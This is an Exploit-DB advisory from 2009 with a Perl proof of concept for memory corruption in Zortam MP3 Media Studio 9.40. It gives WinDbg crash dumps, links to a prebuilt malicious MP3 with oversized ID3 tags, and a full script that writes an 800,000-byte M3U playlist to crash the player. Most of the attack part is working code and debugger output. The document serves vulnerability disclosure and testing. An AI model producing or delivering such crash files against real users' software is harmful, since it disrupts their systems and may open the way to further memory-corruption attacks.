Zortam MP3 Media Studio 9.40 - Multiple Memory Corruption Vulnerabilities

EDB-ID:

9169

CVE:

N/A


Author:

LiquidWorm

Type:

dos


Platform:

Windows

Date:

2009-07-16


#!/usr/bin/perl
#
#
# Title: Zortam MP3 Media Studio 9.40 Multiple Memory Corruption Vulnerabilities
#
# Product web page: http://www.zortam.com
#
# Desc: Zortam MP3 Studio version 9.40 suffers from a memory corruption attack from
#       two different malicious files. The first method is thru a .mp3 file which
#       has its ID3 tags filled with long strings. The second method is a .m3u list
#       which is loaded in to the player resulting in memory corruption of the whole
#       application including Dr.Watson crashing along with the app. For 1st method,
#       you can click the Search Media for MP3's button and select the folder where
#       the .mp3 file with the long ID3 tags is located..boom! The 2nd method, load
#       .m3u file into the MP3 Player..boom boom!
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
#
# WinDbg:
#
# [*] overly long id3 tags (.mp3 file):
# ---------------------------------------------------------------------------
#
# (edc.f34): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00014d6a ebx=00014d6b ecx=000052c8 edx=00029ad4 esi=03a64ffd edi=03aa3864
# eip=005788fe esp=0012cc9c ebp=00029ad4 iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00050202
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for [path]\zmmspro.exe - 
# zmmspro!ID3_FrameInfo::FieldFlags+0xdce:
# 005788fe f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
#
# ---------------------------------------------------------------------------
#
#
# [*] long playlist (.m3u file):
# ---------------------------------------------------------------------------
#
# (84.b98): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000111 ecx=00000000 edx=00000000 esi=0012ed5c edi=01e33f54
# eip=005b7ad9 esp=0012ed18 ebp=0012ed2c iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00050206
# zmmspro!ID3_FrameInfo::FieldFlags+0x3ffa9:
# 005b7ad9 8b01            mov     eax,dword ptr [ecx]  ds:0023:00000000=????????
# 0:000> g
# (84.b98): Access violation - code c0000005 (!!! second chance !!!)
# eax=00000000 ebx=00000111 ecx=00000000 edx=00000000 esi=0012ed5c edi=01e33f54
# eip=005b7ad9 esp=0012ed18 ebp=0012ed2c iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00040206
# zmmspro!ID3_FrameInfo::FieldFlags+0x3ffa9:
# 005b7ad9 8b01            mov     eax,dword ptr [ecx]  ds:0023:00000000=????????
#
# ---------------------------------------------------------------------------
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# Zero Science Lab - http://www.zeroscience.org
#
# 16.07.2009
#
#

 

 # For first method, use folowing PoC file:			#
 #								#
 ################################################################
 #								#
 # - 1. http://zeroscience.org/codes/aimp2_evil.mp3     	#
 #								#
 # - 2. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8837.mp3 (2009-aimp2_evil.mp3) (mirror)	#
 #								#
 # - 3. http://securityreason.com/download/11/13 (mirror)	#
 #								#
 ################################################################
 #								#
 #								#


 # For second method, use folowing PoC code:
 #

 $fle = "Kung_PoW.m3u";
 $mna = "A" x 800000;
 print "\n\n[+] Creating playlist file: $fle ...\r\n";
 sleep 1;
 open(m3u, ">./$fle") || die "\n\aCannot open $fle: $!";
 print m3u "$mna";
 close (m3u);
 print "\n[+] Playlist file successfully created!\r\n";

# milw0rm.com [2009-07-16]